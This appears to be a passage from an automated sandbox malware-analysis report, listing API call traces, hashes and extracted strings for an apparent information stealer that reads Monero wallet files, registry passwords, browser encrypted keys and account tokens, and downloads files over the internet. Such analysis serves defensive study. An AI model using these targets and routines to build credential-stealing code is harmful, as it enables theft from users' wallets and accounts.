                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: 99aa5cdaa5562e3ef4bd5dbd14c540679a3854c4fee8b16f3fffbb8408ba732d
                              • Instruction ID: 10f2f9c1642742518d418628fa3b36325493d0f96608cfc1ae818d693380da64
                              • Opcode Fuzzy Hash: 99aa5cdaa5562e3ef4bd5dbd14c540679a3854c4fee8b16f3fffbb8408ba732d
                              • Instruction Fuzzy Hash: 23C1C7B5D41108EBCB54EF60DC8DFEA7378BB94304F004699F50AA7181DB78AA95CF92
                              APIs
                                • Part of subcall function 007A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 007A8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 007A42EC
                              • lstrcat.KERNEL32(?,014CE160), ref: 007A430B
                              • lstrcat.KERNEL32(?,?), ref: 007A431F
                              • lstrcat.KERNEL32(?,014CD480), ref: 007A4333
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                                • Part of subcall function 007A8D90: GetFileAttributesA.KERNEL32(00000000,?,00791B54,?,?,007B564C,?,?,007B0E1F), ref: 007A8D9F
                                • Part of subcall function 00799CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00799D39
                                • Part of subcall function 007999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007999EC
                                • Part of subcall function 007999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00799A11
                                • Part of subcall function 007999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00799A31
                                • Part of subcall function 007999C0: ReadFile.KERNEL32(000000FF,?,00000000,0079148F,00000000), ref: 00799A5A
                                • Part of subcall function 007999C0: LocalFree.KERNEL32(0079148F), ref: 00799A90
                                • Part of subcall function 007999C0: CloseHandle.KERNEL32(000000FF), ref: 00799A9A
                                • Part of subcall function 007A93C0: GlobalAlloc.KERNEL32(00000000,007A43DD,007A43DD), ref: 007A93D3
                              • StrStrA.SHLWAPI(?,014CE0E8), ref: 007A43F3
                              • GlobalFree.KERNEL32(?), ref: 007A4512
                                • Part of subcall function 00799AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ny,00000000,00000000), ref: 00799AEF
                                • Part of subcall function 00799AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00794EEE,00000000,?), ref: 00799B01
                                • Part of subcall function 00799AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ny,00000000,00000000), ref: 00799B2A
                                • Part of subcall function 00799AC0: LocalFree.KERNEL32(?,?,?,?,00794EEE,00000000,?), ref: 00799B3F
                              • lstrcat.KERNEL32(?,00000000), ref: 007A44A3
                              • StrCmpCA.SHLWAPI(?,007B08D1), ref: 007A44C0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007A44D2
                              • lstrcat.KERNEL32(00000000,?), ref: 007A44E5
                              • lstrcat.KERNEL32(00000000,007B0FB8), ref: 007A44F4
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                              • String ID:
                              • API String ID: 3541710228-0
                              • Opcode ID: a75271beb1830189d39dbdabfdf44e6aaca6bd70259ab62795b60fb58825f820
                              • Instruction ID: 07729dd930e0b217a622130532790a217e91879ce7d960c44527c59ea4cbbd61
                              • Opcode Fuzzy Hash: a75271beb1830189d39dbdabfdf44e6aaca6bd70259ab62795b60fb58825f820
                              • Instruction Fuzzy Hash: 897186B6D10208ABDB14EBA0DC89FEE7379AB89300F004598F60597181EB79DB55DB92
                              APIs
                                • Part of subcall function 007912A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 007912B4
                                • Part of subcall function 007912A0: RtlAllocateHeap.NTDLL(00000000), ref: 007912BB
                                • Part of subcall function 007912A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 007912D7
                                • Part of subcall function 007912A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 007912F5
                                • Part of subcall function 007912A0: RegCloseKey.ADVAPI32(?), ref: 007912FF
                              • lstrcat.KERNEL32(?,00000000), ref: 0079134F
                              • lstrlen.KERNEL32(?), ref: 0079135C
                              • lstrcat.KERNEL32(?,.keys), ref: 00791377
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                                • Part of subcall function 007AA9B0: lstrlen.KERNEL32(?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007AA9C5
                                • Part of subcall function 007AA9B0: lstrcpy.KERNEL32(00000000), ref: 007AAA04
                                • Part of subcall function 007AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 007AAA12
                                • Part of subcall function 007AA8A0: lstrcpy.KERNEL32(?,007B0E17), ref: 007AA905
                                • Part of subcall function 007A8B60: GetSystemTime.KERNEL32(007B0E1A,014CA850,007B05AE,?,?,007913F9,?,0000001A,007B0E1A,00000000,?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007A8B86
                                • Part of subcall function 007AA920: lstrcpy.KERNEL32(00000000,?), ref: 007AA972
                                • Part of subcall function 007AA920: lstrcat.KERNEL32(00000000), ref: 007AA982
                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00791465
                                • Part of subcall function 007AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 007AA7E6
                                • Part of subcall function 007999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007999EC
                                • Part of subcall function 007999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00799A11
                                • Part of subcall function 007999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00799A31
                                • Part of subcall function 007999C0: ReadFile.KERNEL32(000000FF,?,00000000,0079148F,00000000), ref: 00799A5A
                                • Part of subcall function 007999C0: LocalFree.KERNEL32(0079148F), ref: 00799A90
                                • Part of subcall function 007999C0: CloseHandle.KERNEL32(000000FF), ref: 00799A9A
                              • DeleteFileA.KERNEL32(00000000), ref: 007914EF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                              • API String ID: 3478931302-218353709
                              • Opcode ID: 13bf9a299648f9616ca2e9ea86680c06f5c5983d63f1ba5095cf6d384f46fd0f
                              • Instruction ID: 3c79eb0e7beb3298c44f9d7715dcb5bfe476310a15995dfa11030242281e9785
                              • Opcode Fuzzy Hash: 13bf9a299648f9616ca2e9ea86680c06f5c5983d63f1ba5095cf6d384f46fd0f
                              • Instruction Fuzzy Hash: 2E5146B1D50119EBCB55FB60DC95BED737CAF55300F4042A8B60A62091EF386B85CFA6
                              APIs
                                • Part of subcall function 007972D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0079733A
                                • Part of subcall function 007972D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 007973B1
                                • Part of subcall function 007972D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0079740D
                                • Part of subcall function 007972D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00797452
                                • Part of subcall function 007972D0: HeapFree.KERNEL32(00000000), ref: 00797459
                              • lstrcat.KERNEL32(00000000,007B17FC), ref: 00797606
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00797648
                              • lstrcat.KERNEL32(00000000, : ), ref: 0079765A
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0079768F
                              • lstrcat.KERNEL32(00000000,007B1804), ref: 007976A0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007976D3
                              • lstrcat.KERNEL32(00000000,007B1808), ref: 007976ED
                              • task.LIBCPMTD ref: 007976FB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                               • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                              • String ID: :
                              • API String ID: 2677904052-3653984579
                              • Opcode ID: c7dd5d55c88825933f5c3be21dd780455093a45ae0d70494567cdffbcc04f6a9
                              • Instruction ID: 06fd397d58a6fa896d17f1cc1d1540929655f5a9f5090c7ce43ce2bea3be9639
                              • Opcode Fuzzy Hash: c7dd5d55c88825933f5c3be21dd780455093a45ae0d70494567cdffbcc04f6a9
                              • Instruction Fuzzy Hash: 3631A171955109DFCF48EBB4EC99DFF7374BB44301B544109F102A7290DA38AD92EB52
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,014CE010,00000000,?,007B0E2C,00000000,?,00000000), ref: 007A8130
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007A8137
                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 007A8158
                              • __aulldiv.LIBCMT ref: 007A8172
                              • __aulldiv.LIBCMT ref: 007A8180
                              • wsprintfA.USER32 ref: 007A81AC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                               • Associated: same fourteen memory dumps as the preceding function records
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB$@
                              • API String ID: 2774356765-3474575989
                              • Opcode ID: ea9e2a76949b09aa890407300a68831c1a3f7128f46c012f2217ad132e418662
                              • Instruction ID: 73060272a5d2e9c13ba52b15c3db703482e6666286231b715a011bb197bff887
                              • Opcode Fuzzy Hash: ea9e2a76949b09aa890407300a68831c1a3f7128f46c012f2217ad132e418662
                              • Instruction Fuzzy Hash: E7211AB1E44218ABDB10DFD4CC49FAFB7B8FB45B10F104609F605BB280D77869018BA6
                              APIs
                                • Part of subcall function 007AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 007AA7E6
                                • Part of subcall function 007947B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00794839
                                • Part of subcall function 007947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00794849
                              • InternetOpenA.WININET(007B0DF7,00000001,00000000,00000000,00000000), ref: 0079610F
                              • StrCmpCA.SHLWAPI(?,014CEA08), ref: 00796147
                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0079618F
                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 007961B3
                              • InternetReadFile.WININET(?,?,00000400,?), ref: 007961DC
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0079620A
                              • CloseHandle.KERNEL32(?,?,00000400), ref: 00796249
                              • InternetCloseHandle.WININET(?), ref: 00796253
                              • InternetCloseHandle.WININET(00000000), ref: 00796260
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                               • Associated: same fourteen memory dumps as the preceding function records
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                              • String ID:
                              • API String ID: 2507841554-0
                              • Opcode ID: 2b1c22f33f2c9c41cc93bcb13c1d3c1e6a252dd401f853e0e1ef68a680fb90ee
                              • Instruction ID: 319aecddac23929ecd4eeaee8cd2516df9c29e266d038d83ba24a3b9aae9c1c3
                              • Opcode Fuzzy Hash: 2b1c22f33f2c9c41cc93bcb13c1d3c1e6a252dd401f853e0e1ef68a680fb90ee
                              • Instruction Fuzzy Hash: 1E5190B1A40208EBDF20DFA0DC49BEE77B8FB44701F108299B605A71C0DB786A85DF95
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0079733A
                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 007973B1
                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0079740D
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00797452
                              • HeapFree.KERNEL32(00000000), ref: 00797459
                              • task.LIBCPMTD ref: 00797555
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                               • Associated: same fourteen memory dumps as the preceding function records
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeOpenProcessValuetask
                              • String ID: Password
                              • API String ID: 775622407-3434357891
                              • Opcode ID: 881f52d00a7bda4975e3e7c108508a890f712175288488339b61e1a8b5d8f76f
                              • Instruction ID: 6128a4e9f93017223601d17786c39e69553768401ec3fe6abfbb9259683d7ef6
                              • Opcode Fuzzy Hash: 881f52d00a7bda4975e3e7c108508a890f712175288488339b61e1a8b5d8f76f
                              • Instruction Fuzzy Hash: F5613AB5914168DBDF24DB50DC45BEAB7B8BF44300F0081E9E689A6141DBB46FC9CFA1
                              APIs
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                                • Part of subcall function 007AA9B0: lstrlen.KERNEL32(?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007AA9C5
                                • Part of subcall function 007AA9B0: lstrcpy.KERNEL32(00000000), ref: 007AAA04
                                • Part of subcall function 007AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 007AAA12
                                • Part of subcall function 007AA920: lstrcpy.KERNEL32(00000000,?), ref: 007AA972
                                • Part of subcall function 007AA920: lstrcat.KERNEL32(00000000), ref: 007AA982
                                • Part of subcall function 007AA8A0: lstrcpy.KERNEL32(?,007B0E17), ref: 007AA905
                                • Part of subcall function 007AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 007AA7E6
                              • lstrlen.KERNEL32(00000000), ref: 0079BC9F
                                • Part of subcall function 007A8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 007A8E52
                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 0079BCCD
                              • lstrlen.KERNEL32(00000000), ref: 0079BDA5
                              • lstrlen.KERNEL32(00000000), ref: 0079BDB9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                               • Associated: same fourteen memory dumps as the preceding function records
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                              • API String ID: 3073930149-1079375795
                              • Opcode ID: cf8085893f76ef26a52c5dc23d55631c66cfda675da7dcbb664b257638aa3b36
                              • Instruction ID: 34e9cf0b98c1718954fe85d75f86e006e4fe06ad729448831d4e66514bc8215f
                              • Opcode Fuzzy Hash: cf8085893f76ef26a52c5dc23d55631c66cfda675da7dcbb664b257638aa3b36
                              • Instruction Fuzzy Hash: 69B10271910108EBDF45FBA0DD9AEEE7378AF95300F404269F507A6091EF3C6A59CB62
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                               • Associated: same fourteen memory dumps as the preceding function records
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess$DefaultLangUser
                              • String ID: *
                              • API String ID: 1494266314-163128923
                              • Opcode ID: 7bec4dc56ac6408a3ef0d3661dd6f5306750947221898a061f328fd92f948282
                              • Instruction ID: ec17b857496cc4d993824b899281c98d0276dd52cca76cdb166ae6607205c2b0
                              • Opcode Fuzzy Hash: 7bec4dc56ac6408a3ef0d3661dd6f5306750947221898a061f328fd92f948282
                              • Instruction Fuzzy Hash: 0FF08931DAE209EFD3449FE0E90972C7B70FB05703F04019AF60586290D6744BA1EF96
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00794FCA
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00794FD1
                              • InternetOpenA.WININET(007B0DDF,00000000,00000000,00000000,00000000), ref: 00794FEA
                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00795011
                              • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00795041
                              • InternetCloseHandle.WININET(?), ref: 007950B9
                              • InternetCloseHandle.WININET(?), ref: 007950C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                               • Associated: same fourteen memory dumps as the preceding function records
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                              • String ID:
                              • API String ID: 3066467675-0
                              • Opcode ID: 77697674ddb4ca14f0d4d94ad744952638e38f9ecc7b184f8a94376d2f89c963
                              • Instruction ID: b7c4307c517af03a534b923109c13c47dff56c115926a8d19076059f898ab107
                              • Opcode Fuzzy Hash: 77697674ddb4ca14f0d4d94ad744952638e38f9ecc7b184f8a94376d2f89c963
                              • Instruction Fuzzy Hash: F83116B4A41218ABDB20CF64DC85BDCB7B4EB48704F1081D9FA09A7281C7746EC59F99
                              APIs
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 007A8426
                              • wsprintfA.USER32 ref: 007A8459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 007A847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 007A848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 007A8499
                                • Part of subcall function 007AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 007AA7E6
                              • RegQueryValueExA.ADVAPI32(00000000,014CDF20,00000000,000F003F,?,00000400), ref: 007A84EC
                              • lstrlen.KERNEL32(?), ref: 007A8501
                              • RegQueryValueExA.ADVAPI32(00000000,014CDE48,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,007B0B34), ref: 007A8599
                              • RegCloseKey.ADVAPI32(00000000), ref: 007A8608
                              • RegCloseKey.ADVAPI32(00000000), ref: 007A861A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                               • Associated: same fourteen memory dumps as the preceding function records
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                              • String ID: %s\%s
                              • API String ID: 3896182533-4073750446
                              • Opcode ID: 198068c8c455cf63ba0cd7dfbc0ec8266fe2cf0d134dc350115015b9846f6c94
                              • Instruction ID: 72c2f8ab7bda319e0735cd6886a11f0526856de48302e25bd48b0e154df2429e
                              • Opcode Fuzzy Hash: 198068c8c455cf63ba0cd7dfbc0ec8266fe2cf0d134dc350115015b9846f6c94
                              • Instruction Fuzzy Hash: 962139B1950218ABDB64DB54DC85FE9B3B8FB88700F00C2D9E609A6140DF75AAC1CFD5
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007A76A4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007A76AB
                              • RegOpenKeyExA.ADVAPI32(80000002,014BC428,00000000,00020119,00000000), ref: 007A76DD
                              • RegQueryValueExA.ADVAPI32(00000000,014CDFE0,00000000,00000000,?,000000FF), ref: 007A76FE
                              • RegCloseKey.ADVAPI32(00000000), ref: 007A7708
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                               • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: f48abbb601915049f5191c6298fbb505435176ba9aa307e6fe9c852176f38ef1
                              • Instruction ID: 5ffbf04a756f40f4bd7a3ab9a857190c4519867749991aeb16f8180ea1b8000c
                              • Opcode Fuzzy Hash: f48abbb601915049f5191c6298fbb505435176ba9aa307e6fe9c852176f38ef1
                              • Instruction Fuzzy Hash: EC018FB4A98204BBD700DBE0DC49FAAB7B8EB48701F004155FA0497290D6749950EB51
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007A7734
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007A773B
                              • RegOpenKeyExA.ADVAPI32(80000002,014BC428,00000000,00020119,007A76B9), ref: 007A775B
                              • RegQueryValueExA.ADVAPI32(007A76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 007A777A
                              • RegCloseKey.ADVAPI32(007A76B9), ref: 007A7784
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                               • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmp
